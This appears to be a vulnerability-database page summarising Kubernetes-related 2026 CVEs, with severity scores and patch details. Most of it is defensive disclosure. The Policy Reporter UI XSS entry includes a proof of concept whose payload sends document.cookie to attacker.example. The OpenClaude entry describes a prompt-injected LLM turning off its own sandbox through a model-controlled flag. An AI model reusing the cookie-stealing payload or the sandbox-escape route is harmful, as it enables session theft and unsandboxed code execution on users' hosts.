Skip to main content

Kubernetes

594 CVEs product

Monthly

CVE-2026-45401 PyPI HIGH PATCH GHSA This Week

Open WebUI versions ≤0.9.4 allow authenticated users to bypass SSRF protections and read internal network resources via HTTP redirect-following. The vulnerability exists in five distinct code paths: web-fetch retrieval, image-loading endpoints, chat-completion image inlining, and OAuth/tool-server execution flows. Any authenticated user can submit a public URL that 302-redirects to internal addresses (127.0.0.1, 169.254.169.254 cloud metadata, RFC1918 private networks) and receive the response body. The vendor confirms active exploitation in the wild was NOT observed, but publicly available exploit code exists (PoC in advisory) and EPSS score of 0.00043 (4.3%) suggests low automated scanning targeting at time of analysis. Fixed in version 0.9.5 released March 2025.

Kubernetes SSRF
NVD GitHub
CVSS 3.1
8.5
EPSS
0.0%
CVE-2026-45021 Go MEDIUM PATCH GHSA This Month

Kuma Control Plane with default configuration leaks admin bootstrap tokens and signing keys to any website an operator visits if the control plane is reachable from their browser. The vulnerability combines default CORS settings allowing all origins (CorsAllowedDomains: [".*"]) with LocalhostIsAdmin: true, which grants admin privileges to any request from 127.0.0.1 without validating whether it originates from a trusted same-origin context. An attacker's JavaScript on a visited webpage can cross-origin fetch the admin token and cryptographic material via browser requests to localhost:5681. This is not actively exploited in the wild but represents a realistic threat in developer and testing environments where control planes run on workstations with web browsers.

Kubernetes Docker Information Disclosure
NVD GitHub VulDB
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-44883 Go HIGH PATCH GHSA This Week

Token leakage in Portainer's authentication middleware allows JWT bearer tokens passed via the `?token=<JWT>` URL query parameter to be harvested from reverse-proxy access logs, browser history, and HTTP Referer headers, enabling account takeover for the validity window of the token (default 8 hours). The flaw affected any user with container exec/attach rights - not just administrators - and a leaked admin token grants full control of Portainer and every managed Docker/Kubernetes environment. No public exploit identified at time of analysis, though the underlying behavior was present since JWT auth was introduced and the GitHub Security Advisory provides sufficient detail to weaponize.

Kubernetes Docker Information Disclosure Nginx
NVD GitHub
CVSS 4.0
7.7
EPSS
0.1%
CVE-2026-44882 Go HIGH PATCH GHSA This Week

Authorization bypass in Portainer 2.33.0 through 2.33.7 allows authenticated users to access Kubernetes cluster resources beyond their assigned permissions due to missing return statement in middleware error handling. Any user with a valid Portainer session can exploit this to read or modify Kubernetes secrets, pods, deployments, and other resources on endpoints they should not access. The flaw affects both Community Edition and Enterprise Edition. Fixed in version 2.33.8 and inherently absent from 2.39.0+. No public exploit code identified at time of analysis, though the single-line code fix and detailed GitHub advisory make reproduction straightforward for authenticated attackers.

Authentication Bypass Kubernetes
NVD GitHub
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-44881 Go HIGH PATCH GHSA This Week

Arbitrary file read in Portainer Community Edition allows authenticated low-privileged users to exfiltrate any file readable by the Portainer process — commonly root — by submitting a Git-backed stack whose docker-compose.yml is a symlink to a target like /etc/shadow or a Kubernetes service account token. The flaw stems from go-git v5 materializing Git symlink blobs as real OS symlinks during checkout combined with GetFileContent reading the entry point through os.ReadFile without resolving links, and is amplified by Portainer's scheduled stack auto-update, which lets a previously benign repository turn malicious after initial review. A fully validated proof-of-concept exists from the reporter (b-hermes), but there is no public exploit identified at time of analysis and no CISA KEV listing.

Kubernetes Docker RCE
NVD GitHub
CVSS 4.0
8.5
EPSS
0.1%
CVE-2026-42457 CRITICAL PATCH Act Now

Stored Cross-Site Scripting (XSS) in vCluster Platform allows authenticated attackers with namespace creation privileges to inject malicious scripts via the templateRef name field, potentially escalating to Global-Admin access. The vulnerability affects versions prior to 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0. With a CVSS score of 9.0 and changed scope (S:C), this represents a critical privilege escalation path in Kubernetes multi-tenancy environments. No active exploitation confirmed by CISA KEV at time of analysis, but the low attack complexity (AC:L) and clear attack path make this an immediate patching priority for organizations running vCluster Platform.

Kubernetes XSS
NVD GitHub VulDB
CVSS 3.1
9.0
EPSS
0.0%
CVE-2026-44774 Go MEDIUM PATCH GHSA This Month

Unauthorized write access to Traefik's live dynamic configuration is achievable by a low-privileged Kubernetes tenant in shared Gateway deployments, because the Gateway API provider's `isInternalService()` check accepts any `TraefikService` name ending in `@internal` - not exclusively the intended `api@internal`. This allows a tenant with `HTTPRoute` creation rights to route external traffic to `rest@internal`, fully bypassing the `providers.rest.insecure=false` safeguard and gaining `PUT /api/providers/rest` write access. No active exploitation is confirmed (not in CISA KEV, EPSS at 0.01%), but a detailed proof-of-concept is published in the GHSA advisory and the SSVC framework marks the attack as automatable for tenants meeting the prerequisites.

Denial Of Service Authentication Bypass Kubernetes
NVD GitHub VulDB
CVSS 4.0
6.4
EPSS
0.0%
CVE-2026-42074 npm CRITICAL PATCH GHSA Act Now

Sandbox escape in OpenClaude (npm package openclaude) versions before 0.5.1 allows a prompt-injected LLM to disable host sandboxing by setting the model-controlled `dangerouslyDisableSandbox: true` flag in any Bash tool_use call, yielding full unsandboxed command execution on the host. CVSS 4.0 scores this 9.3 Critical (AV:N/AC:L/PR:N/UI:N, VC/VI/VA:H); no public exploit identified at time of analysis beyond the reporter's PoC, but the upstream fix has been merged. The flaw is especially severe because it is reachable under default settings (`allowUnsandboxedCommands` defaults to true).

Kubernetes Information Disclosure Authentication Bypass Python RCE +2
NVD GitHub
CVSS 4.0
9.3
EPSS
0.1%
CVE-2026-45321 npm CRITICAL POC KEV PATCH THREAT GHSA MAL Act Now

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actions exploitation. Attackers combined pull_request_target misconfiguration, Actions cache poisoning, and OIDC token memory extraction to publish malicious code under the legitimate TanStack identity. Installing any affected version executes a 2.3 MB obfuscated payload that exfiltrates AWS/GCP/Kubernetes credentials, npm tokens, GitHub secrets, SSH keys, and HashiCorp Vault tokens over encrypted Session/Oxen messenger infrastructure. The payload propagates by republishing victim-maintained packages with identical injection. Socket.dev and the TanStack team confirmed the incident via GHSA-g7cv-rxg3-hmpx. No EPSS or CISA KEV data available for this recent supply-chain attack. CVSS 9.6 reflects the cross-scope credential theft impact (S:C/C:H/I:H), though exploitation requires user-initiated package installation (UI:R).

Kubernetes Node.js Hashicorp Information Disclosure
NVD GitHub VulDB
CVSS 3.1
9.6
EPSS
0.0%
Threat
4.9
CVE-2026-44543 Go HIGH PATCH GHSA This Week

Template injection in Rancher Local Path Provisioner allows Kubernetes cluster operators with ConfigMap edit permissions to escalate privileges to node-level root access. Attackers with write access to the local-path-config ConfigMap can inject malicious Pod templates that bypass security controls, creating privileged containers with full host filesystem access. This enables theft of ServiceAccount tokens from co-located pods, access to other tenants' persistent volume data, and arbitrary modification of host node files. Vendor-released patch: v0.0.36. CVSS 8.7 (High) reflects the high-privilege prerequisite (PR:H) but scope change to container escape (S:C). No public exploit identified at time of analysis, though exploitation is straightforward for authenticated cluster operators.

Kubernetes Docker Information Disclosure Ssti
NVD GitHub VulDB
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-42876 Go MEDIUM PATCH GHSA This Month

External Secrets Operator versions 0.1.0 through 2.4.0 allow authenticated users with ExternalSecret creation permissions to escalate privileges by crafting Service Account token templates that cause the operator to generate long-lived tokens for any service account in the namespace. An attacker can impersonate service accounts without requiring direct TokenRequest or Secret creation permissions, effectively bypassing RBAC controls. The attack requires the attacker already has ExternalSecret creation permissions and the cluster must have service account token generation enabled, limiting the practical scope to already-privileged users seeking lateral privilege expansion within a namespace.

Kubernetes Authentication Bypass
NVD GitHub
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-44430 Go MEDIUM PATCH GHSA This Month

Server-side request forgery in MCP Registry's HTTP namespace verification endpoint allows unauthenticated attackers to reach internal IPv4 addresses via specially-crafted IPv6 addresses that encode or tunnel to RFC1918 and cloud-metadata services. The vulnerability exists in the private-address blocklist used by `safeDialContext`, which fails to block IPv6 6to4 (2002::/16), NAT64 well-known (64:ff9b::/96), NAT64 local-use (64:ff9b:1::/48), and deprecated site-local (fec0::/10) prefixes. On dual-stack and IPv6-only cloud deployments (GKE IPv6, AWS IPv6-only EC2, Azure NAT64), this enables direct connections to metadata services and internal Kubernetes API servers. No public exploit code identified at time of analysis, but proof-of-concept has been demonstrated against the production registry.

Kubernetes SSRF Microsoft Open Redirect Oracle
NVD GitHub VulDB
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-44589 npm LOW PATCH GHSA Monitor

Server-Side Request Forgery (SSRF) in nuxt-og-image 6.2.5 through 6.4.8 allows remote attackers to bypass the incomplete IPv6 denylist and redirect validation, reaching internal IP addresses and services through incomplete IPv6 prefix filtering and unauthenticated HTTP redirect following. The vulnerability affects the OG image rendering component used by Nuxt applications, enabling attackers to leak internal service responses by injecting crafted IPv6-mapped addresses or chaining external redirects to internal targets.

Kubernetes Redis SSRF Microsoft Node.js
NVD GitHub
CVSS 3.1
3.7
EPSS
0.0%
CVE-2026-44004 npm HIGH PATCH GHSA This Week

Denial-of-service in vm2 Node.js sandbox allows unauthenticated remote attackers to crash host processes via unbounded Buffer.alloc() calls. The vm2 library's timeout mechanism cannot interrupt synchronous C++ native calls, enabling attackers to bypass configured timeout limits and exhaust host heap memory with a single HTTP request. Version 3.11.0 patches this flaw by introducing bufferAllocLimit controls. Publicly available exploit code exists (GHSA-6785-pvv7-mvg7 includes working POC), and while EPSS data is unavailable and the vulnerability is not listed in CISA KEV, the vendor-confirmed POC demonstrates reliable exploitation against default configurations.

Kubernetes Denial Of Service Docker Node.js
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-44001 npm HIGH PATCH GHSA This Week

Remote unauthenticated attackers can crash Node.js processes running vm2 <= 3.10.5 by triggering an unhandled Promise rejection that terminates the host application. The vulnerability exploits an incomplete fix for CVE-2026-22709 - while previous patches sanitized `.then()` and `.catch()` callback chains, they failed to intercept unhandled rejections originating from Promise constructor executors. Publicly available exploit code exists (GitHub advisory GHSA-hw58-p9xv-2mjh). The attack requires minimal resources (150-byte HTTP request) but achieves high impact by crashing entire server processes serving all concurrent users, with demonstrated persistent DoS despite container orchestration restart policies.

Kubernetes Denial Of Service Docker Node.js
NVD GitHub VulDB
CVSS 3.1
8.6
EPSS
0.0%
CVE-2026-44283 Go LOW PATCH GHSA Monitor

etcd RBAC authorization bypass allows authenticated users to read unauthorized data or attach leases via PrevKv or lease attachment features in transaction Put requests, circumventing role-based access control checks. Affects etcd 3.4.x through 3.6.x before patched versions 3.4.44, 3.5.30, and 3.6.11. While Kubernetes deployments are typically not affected because the API server handles its own authorization, etcd deployments with reliance on etcd's built-in RBAC-particularly those managed directly or used outside Kubernetes-face exposure to privilege escalation and unauthorized data access by already-authenticated users.

Authentication Bypass Kubernetes
NVD GitHub VulDB
EPSS
0.0%
CVE-2026-44514 Go MEDIUM PATCH GHSA This Month

Kubetail Dashboard prior to version 0.14.0 fails to validate the Origin header on WebSocket connection upgrades, enabling Cross-Site WebSocket Hijacking (CSWSH) attacks. An authenticated user visiting a malicious web page can be exploited to stream their Kubernetes container logs-including credentials, tokens, and PII often present in logs-to an attacker-controlled server. The vulnerability affects both desktop deployments at localhost:7500 and cluster deployments behind HTTP basic auth, with browser ambient credentials automatically attached to the WebSocket handshake.

Kubernetes Microsoft Docker Information Disclosure Google +1
NVD GitHub VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-42880 Go CRITICAL PATCH GHSA Act Now

Kubernetes Secret extraction in Argo CD v3.2.0-3.2.10 and v3.3.0-3.3.8 allows authenticated users with read-only application permissions to retrieve plaintext credential data including service account tokens, TLS certificates, database passwords, and API keys via the ServerSideDiff endpoint. The vulnerability exists due to missing data masking in the gRPC/REST ServerSideDiff function, which returns raw Kubernetes Server-Side Apply dry-run responses containing unredacted Secret values from etcd when applications are annotated with 'IncludeMutationWebhook=true'. A functional proof-of-concept exploit exists demonstrating automated extraction of all accessible secrets. Vendor-released patches (3.2.11, 3.3.9) are available. CVSS 9.6 reflects network-exploitable, low-complexity attack requiring only low-privilege authenticated access with cross-scope high confidentiality/integrity impact.

Kubernetes Information Disclosure
NVD GitHub
CVSS 3.1
9.6
EPSS
0.0%
CVE-2026-41050 Go CRITICAL PATCH GHSA Act Now

ServiceAccount impersonation bypass in Rancher Fleet allows tenants with git push access to multi-tenant clusters to read secrets from any namespace across all downstream clusters. Two distinct code paths failed to properly apply RBAC constraints: Helm's lookup function executed with cluster-admin credentials instead of the impersonated ServiceAccount, and valuesFrom secret references in fleet.yaml bypassed namespace isolation. Confirmed active exploitation status unknown (not in CISA KEV). CVSS 9.9 with scope-change modifier reflects potential credential leakage to external services. Fleet versions 0.12.0 through 0.15.0 affected across multiple Rancher release branches. Patches available for all supported versions with detailed version matrix provided by SUSE.

Authentication Bypass Kubernetes Suse
NVD GitHub
CVSS 3.1
9.9
EPSS
0.0%
CVE-2026-42594 Go HIGH PATCH GHSA This Week

Unauthenticated remote attackers crash Gotenberg 8.x (≤ 8.31.0) by triggering a race condition between webhook goroutine context reuse and Echo framework connection pooling. When webhook middleware spawns an async goroutine holding an `echo.Context` reference, the synchronous handler returns immediately, recycling the context to Echo's `sync.Pool`. Concurrent requests reset the pooled context, causing unchecked type assertions in the still-running webhook goroutine to panic outside any `recover()` scope, terminating the process with exit code 2. Twenty-four webhook requests plus sixty concurrent GET requests demonstrate reliable two-second crash windows. No patch was available at initial disclosure; upstream commit fixes the panic in version 8.32.0. CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) reflects trivial unauthenticated network exploitation producing complete service disruption.

Kubernetes Denial Of Service Python Race Condition Docker +1
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-44245 Go MEDIUM PATCH GHSA This Month

{{ }} interpolation provides. The PropertyCard.vue component uses v-html for the else branch of the URL check, meaning any non-URL string value flows directly into the DOM as HTML. The isURL() guard only filters values that parse as http: or https: URLs, so any HTML payload not starting with those schemes (e.g., `<img src=x onerror=alert(1)>` padded to exceed 75 chars) bypasses it entirely. The data originates from Kubernetes PolicyReport .results[].properties fields, which are arbitrary string maps populated by policy engines and potentially by any principal with write access to PolicyReport objects in the cluster. No DOMPurify or equivalent HTML sanitization library is present anywhere in the frontend codebase, confirming there is no compensating control between the API response and the sink. This vulnerability was reproduced on the latest policy reporter UI version - 2.5.1. Prerequisites: Kubernetes write access to PolicyReport resources in the target cluster (e.g., via a policy engine service account or direct kubectl access) Create a Kubernetes PolicyReport resource with a crafted property value longer than 75 characters. When an authenticated Policy Reporter UI user browses to the affected namespace and expands the result row containing this property, the injected script executes in their browser. ```bash kubectl apply -f - <<'EOF' apiVersion: [wgpolicyk8s.io/v1alpha2](http://wgpolicyk8s.io/v1alpha2) kind: PolicyReport metadata: name: xss-poc namespace: default results: - message: "test" policy: xss-test-policy rule: check-rule result: fail properties: advisory: "<img src=x onerror=\"fetch('[https://attacker.example/c?c='+document.cookie](https://attacker.example/c?c=%27+document.cookie))\"> padding padding padding" EOF ``` <img width="1562" height="1061" alt="Снимок экрана - 2026-04-21 в 10 52 17" src="https://github.com/user-attachments/assets/fe542ccb-1662-44cb-802f-7998aa145db7" /> <img width="1041" height="939" alt="Снимок экрана - 2026-04-21 в 10 51 44" src="https://github.com/user-attachments/assets/bc07cf20-aea5-4a90-838f-c428d88a92b7" /> XSS

Kubernetes XSS
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-42541 Go MEDIUM PATCH GHSA This Month

Kubewarden versions before 1.35.0 permit RBAC reconnaissance attacks when users with AdmissionPolicy or AdmissionPolicyGroup creation privileges craft policies using the unchecked `can_i` host capability. The vulnerability allows enumeration of any user or service account permissions across the cluster via SubjectAccessReview requests executed with policy-server privileges, despite the absence of context-aware resource grants. This information disclosure enables attackers to discover sensitive permission configurations without requiring cluster-wide policy creation rights, a capability not available by default but exploitable when granted.

Authentication Bypass Privilege Escalation Information Disclosure Kubernetes
NVD GitHub
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-42600 Go MEDIUM PATCH GHSA This Month

Path traversal in MinIO's ReadMultiple internode storage-REST endpoint allows authenticated cluster peers or root-credential holders to read arbitrary files from the host filesystem outside configured drive roots. Distributed-erasure (multi-node) deployments are affected; single-node standalone deployments are not. The vulnerability exists in all releases from RELEASE.2022-07-24T01-54-52Z through RELEASE.2025-09-07T16-13-09Z and has been fixed as of MinIO AIStor RELEASE.2024-10-23T19-38-07Z (with security patch RELEASE.2026-04-14T21-32-45Z recommended). No public exploit code or active exploitation has been identified at time of analysis.

Kubernetes Microsoft Docker Apple Path Traversal
NVD GitHub VulDB
CVSS 4.0
6.9
EPSS
0.1%
CVE-2026-42295 Go HIGH PATCH GHSA This Week

Argo Workflows executor logs artifact repository credentials in plaintext to pod logs during artifact operations, exposing S3 access/secret keys, GCS service account keys, Azure storage keys, and Git passwords. Users with Kubernetes RBAC permissions to read pod logs in the workflow namespace can extract these credentials directly from workflow execution logs. This vulnerability affects Argo Workflows v4.0.0 through v4.0.4 and represents an incomplete fix of CVE-2025-62157. Vendor-released patch (v4.0.5) is available with GitHub commit bdd40908 removing credential-bearing struct logging. No public exploit identified at time of analysis, though exploitation is trivial given the included working proof-of-concept YAML.

Kubernetes Microsoft Information Disclosure Red Hat
NVD GitHub VulDB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-42296 Go HIGH PATCH GHSA This Week

Argo Workflows v3 (< 3.7.14) and v4 (< 4.0.5) allow users to bypass templateReferencing Strict/Secure mode restrictions by setting WorkflowSpec fields like hostNetwork, serviceAccountName, securityContext, tolerations, and volumes. The incomplete fix for CVE-2026-31892 only blocked podSpecPatch but left other security-sensitive fields unvalidated. Authenticated users with create Workflow permission can inject host network access, switch service accounts, modify pod security contexts, or schedule on control-plane nodes despite referencing hardened WorkflowTemplates. Vendor-released patch: v3.7.14 and v4.0.5 (commit 2727f3f). No public exploit identified at time of analysis, but exploitation is straightforward given detailed reproduction steps in the advisory.

Authentication Bypass Kubernetes
NVD GitHub
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-42294 Go HIGH PATCH GHSA This Week

Memory exhaustion crashes Argo Workflows server via unauthenticated multi-gigabyte webhook requests to the publicly accessible `/api/v1/events/` endpoint. The Webhook Interceptor's `io.ReadAll` call allocates unbounded memory before signature verification, enabling remote attackers to trigger out-of-memory (OOM) conditions without authentication or credentials. Vendor-released patches enforce a 2MB body size limit via `io.LimitReader`. Publicly available exploit code exists (conceptual proof-of-concept published in GitHub security advisory GHSA-jcc8-g2q4-9fxq). No active exploitation confirmed by CISA KEV at time of analysis, but the low attack complexity (CVSS AV:N/AC:L/PR:N) and public PoC create immediate risk for internet-exposed Argo Workflows deployments.

Kubernetes Denial Of Service
NVD GitHub VulDB
CVSS 4.0
8.2
EPSS
0.0%
CVE-2026-42297 Go HIGH PATCH GHSA This Week

Missing authorization checks in Argo Workflows v4.0.0-4.0.4 allow any authenticated user-even those with fake Bearer tokens-to create, read, update, and delete Kubernetes ConfigMaps containing workflow synchronization limits. The ConfigMap-backed sync provider (server/sync/sync_cm.go) completely omits auth.CanI permission validation on all four CRUD endpoints. Publicly available exploit code exists (detailed PoC in advisory). CVSS 8.5 reflects network-accessible authentication bypass enabling high integrity/availability impact through denial-of-service and arbitrary ConfigMap manipulation. Patch released in version 4.0.5 adding checkConfigMapPermission() calls to validate Kubernetes RBAC before operations.

Authentication Bypass Denial Of Service Information Disclosure Kubernetes
NVD GitHub VulDB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-43824 Go HIGH PATCH This Week

Authenticated users with low privileges can read cleartext Kubernetes Secret data through Argo CD's ServerSideDiff feature in versions 3.2.0-3.2.10 and 3.3.0-3.3.8. This scope-changing vulnerability (CVSS:3.1 S:C) allows attackers to access sensitive credential data managed by Kubernetes, including database passwords, API tokens, and certificates, by exploiting the server-side diff functionality. With a 7.7 CVSS score and low attack complexity (AC:L), this represents a significant confidentiality breach requiring only network access and basic authentication-no public exploit identified at time of analysis, but the technical barrier to exploitation is minimal.

Information Disclosure Kubernetes Argo Cd
NVD GitHub VulDB
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-41174 Go MEDIUM PATCH GHSA This Month

Traefik versions prior to 2.11.43, 3.6.14, and 3.7.0-rc.2 fail to enforce cross-namespace isolation for middleware references nested inside Chain middlewares, allowing actors with permission to create CRDs in their own namespace to bypass the allowCrossNamespace=false restriction and apply middleware from arbitrary namespaces. This authorization bypass affects Kubernetes clusters relying on namespace isolation controls and can enable unauthorized reuse of security-sensitive middleware policies across namespace boundaries.

Kubernetes Information Disclosure RCE Red Hat Suse
NVD GitHub
CVSS 4.0
4.8
EPSS
0.0%
CVE-2026-3865 Awaiting Data

Pre-NVD disclosure via oss-security: oss-security mailing list - 2026/04/11. ions before 0.23 for Perl does not validate IPv6 group count, which may allow IP ACL bypass (Stig Palmquist <stig@...g.io>) CVE-2026-40199: Net::CIDR::Lite versions before 0.23 for Perl mishandles IPv4 mapped IPv6 addresses, which may allow IP ACL bypas… (Stig Palmquist <stig@...g.io>) [kubernetes] CVE-2026-3865: CSI Driver for SMB path traversal via subDir may delete unintended directories on the SMB s… (Vinayak Goyal <vinayakankugoyal@...il.c…) CPython [CVE-2026-1502] HTTP client proxy tunnel headers not validated for CR/LF (Alan Coopersmith <alan.coopersmith@...cle.com>) CPython [CVE-2026-3446] Base64 d

Kubernetes Path Traversal
NVD
CVE-2026-41068 Go HIGH PATCH GHSA This Week

Cross-namespace privilege escalation in Kyverno 1.17.x allows authenticated namespace administrators to bypass RBAC controls and read ConfigMaps from any Kubernetes namespace. The vulnerability exploits unvalidated `configMap.namespace` field in Kyverno's ConfigMap context loader, enabling attackers to leverage Kyverno's privileged service account permissions. This is a regression following incomplete fix for CVE-2026-22039, which addressed the same issue in `apiCall` context but missed the ConfigMap loader. Patch available in version 1.17.2. CVSS 7.7 with Changed Scope indicates significant multi-tenant cluster risk; EPSS data not available but the regression nature and RBAC bypass impact warrant immediate patching in multi-tenant environments.

Kubernetes Authentication Bypass Privilege Escalation Suse
NVD GitHub
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-41246 Go HIGH PATCH GHSA This Week

Contour is a Kubernetes ingress controller using Envoy proxy. From v1.19.0 to before v1.33.4, v1.32.5, and v1.31.6, Contour's Cookie Rewriting feature is vulnerable to Lua code injection. An attacker with RBAC permissions to create or modify HTTPProxy resources can craft a malicious value in spec.routes[].cookieRewritePolicies[].pathRewrite.value or spec.routes[].services[].cookieRewritePolicies[].pathRewrite.value that results in arbitrary code execution in the Envoy proxy. The cookie rewriting feature is internally implemented using Envoy's HTTP Lua filter. User-controlled values are interpolated into Lua source code using Go text/template without sufficient sanitization. The injected code only executes when processing traffic on the attacker's own route, which they already control. However, since Envoy runs as shared infrastructure, the injected code can also read Envoy's xDS client credentials from the filesystem or cause denial of service for other tenants sharing the Envoy instance. This vulnerability is fixed in v1.33.4, v1.32.5, and v1.31.6.

Kubernetes Denial Of Service Code Injection RCE Contour
NVD GitHub
CVSS 3.1
8.1
EPSS
0.1%
CVE-2026-40886 Go HIGH PATCH GHSA This Week

Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. From 3.6.5 to 4.0.4, an unchecked array index in the pod informer's podGCFromPod() function causes a controller-wide panic when a workflow pod carries a malformed workflows.argoproj.io/pod-gc-strategy annotation. Because the panic occurs inside an informer goroutine (outside the controller's recover() scope), it crashes the entire controller process. The poisoned pod persists across restarts, causing a crash loop that halts all workflow processing until the pod is manually deleted. This vulnerability is fixed in 4.0.5 and 3.7.14.

Kubernetes Denial Of Service Argo Workflows
NVD GitHub VulDB
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-41322 npm MEDIUM PATCH GHSA This Month

Cache poisoning in @astrojs/node versions 9.4.4 and earlier allows unauthenticated remote attackers to poison CDN caches by sending malformed if-match headers to static asset endpoints, causing the server to return 500 errors with immutable one-year cache directives instead of the correct 412 Precondition Failed response. This vulnerability affects all subsequent requests to poisoned assets until the cache expires, breaking application functionality for legitimate users. The vulnerability is not actively exploited in the wild, but proof-of-concept exploitation is straightforward and requires only a single crafted HTTP request.

Kubernetes Information Disclosure Mozilla
NVD GitHub VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-40923 Go MEDIUM PATCH GHSA This Month

Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Prior to 1.11.1, a validation bypass in the VolumeMount path restriction allows mounting volumes under restricted /tekton/ internal paths by using .. path traversal components. The restriction check uses strings.HasPrefix without filepath.Clean, so a path like /tekton/home/../results passes validation but resolves to /tekton/results at runtime. This vulnerability is fixed in 1.11.1.

Kubernetes Path Traversal Red Hat Suse
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-40924 Go MEDIUM PATCH GHSA This Month

Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Prior to 1.11.1, the HTTP resolver's FetchHttpResource function calls io.ReadAll(resp.Body) with no response body size limit. Any tenant with permission to create TaskRuns or PipelineRuns that reference the HTTP resolver can point it at an attacker-controlled HTTP server that returns a very large response body within the 1-minute timeout window, causing the tekton-pipelines-resolvers pod to be OOM-killed by Kubernetes. Because all resolver types (Git, Hub, Bundle, Cluster, HTTP) run in the same pod, crashing this pod denies resolution service to the entire cluster. Repeated exploitation causes a sustained crash loop. The same vulnerable code path is reached by both the deprecated pkg/resolution/resolver/http and the current pkg/remoteresolution/resolver/http implementations. This vulnerability is fixed in 1.11.1.

Denial Of Service Kubernetes Suse Red Hat
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-40938 Go HIGH PATCH GHSA This Week

Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. From 1.0.0 to before 1.11.0, the git resolver's revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=<binary>. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration. This vulnerability is fixed in 1.11.1.

Kubernetes RCE Pipeline
NVD GitHub VulDB
CVSS 3.1
8.5
EPSS
0.1%
CVE-2026-33519 CRITICAL Act Now

An incorrect authorization vulnerability exists in Esri Portal for ArcGIS 11.4, 11.5 and 12.0 on Windows, Linux and Kubernetes that did not correctly check permissions assigned to developer credentials.

Information Disclosure Kubernetes Microsoft
NVD VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-40161 Go HIGH PATCH GHSA This Week

Credential leakage in Tekton Pipelines git resolver allows authenticated users to exfiltrate system-configured Git API tokens (GitHub PAT, GitLab tokens) by directing the resolver to attacker-controlled endpoints. Affects versions 1.0.0 through 1.10.0 when users omit the token parameter in TaskRun or PipelineRun configurations. CVSS 7.7 with scope change reflects cross-tenant credential theft potential in multi-tenant Kubernetes environments. No active exploitation confirmed (not in CISA KEV), but exploitation is straightforward for authenticated cluster users with TaskRun/PipelineRun creation privileges.

Information Disclosure Kubernetes Gitlab
NVD GitHub VulDB
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-25542 Go MEDIUM PATCH GHSA This Month

Tekton Pipelines 0.43.0 through 1.11.0 allows authenticated attackers to bypass trusted resource verification policies via unanchored regular expression patterns that match substrings rather than exact resource sources, enabling policy manipulation and unauthorized verification mode changes. The vulnerability stems from Go's regexp.MatchString function matching patterns anywhere within a string rather than requiring full anchoring, permitting attackers to craft source URIs containing trusted patterns as substrings to trigger unintended policy matches and potentially apply weaker verification keys or modes.

Authentication Bypass Kubernetes
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-40324 NuGet CRITICAL PATCH GHSA Act Now

Hot Chocolate's `Utf8GraphQLParser` is a recursive descent parser with no recursion depth limit. A crafted GraphQL document with deeply nested selection sets, object values, list values, or list types can trigger a `StackOverflowException` on payloads as small as **40 KB**. Because `StackOverflowException` is **uncatchable in .NET** (since .NET 2.0), the entire worker process is terminated immediately. All in-flight HTTP requests, background `IHostedService` tasks, and open WebSocket subscriptions on that worker are dropped. The orchestrator (Kubernetes, IIS, etc.) must restart the process. This occurs **before any validation rules run** - `MaxExecutionDepth`, complexity analyzers, persisted query allow-lists, and custom `IDocumentValidatorRule` implementations cannot intercept the crash because `Utf8GraphQLParser.Parse` is invoked before validation. The existing `MaxAllowedFields=2048` limit does not help because the crashing payloads contain very few fields. **Severity:** Critical (9.1) - `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H` - **v12 line:** Fixed in `12.22.7` - **v13 line:** Fixed in `13.9.16` - **v14 line:** Fixed in `14.3.1` - **v15 line:** Fixed in `15.1.14` The fix adds a `MaxAllowedRecursionDepth` option to `ParserOptions` with a safe default, and enforces it across all recursive parser methods (`ParseSelectionSet`, `ParseValueLiteral`, `ParseObject`, `ParseList`, `ParseTypeReference`, etc.). When the limit is exceeded, a catchable `SyntaxException` is thrown instead of overflowing the stack. There is no application-level workaround. `StackOverflowException` cannot be caught in .NET. The only mitigation is to upgrade to a patched version. Operators can reduce (but not eliminate) risk by limiting HTTP request body size at the reverse proxy or load balancer layer, though the smallest crashing payload (40 KB) is well below most default body size limits and is highly compressible (~few hundred bytes via gzip). - Fix for v15: https://github.com/ChilliCream/graphql-platform/pull/9528

Denial Of Service Kubernetes
NVD GitHub
CVSS 3.1
9.1
EPSS
0.1%
CVE-2026-40594 PyPI MEDIUM PATCH GHSA This Month

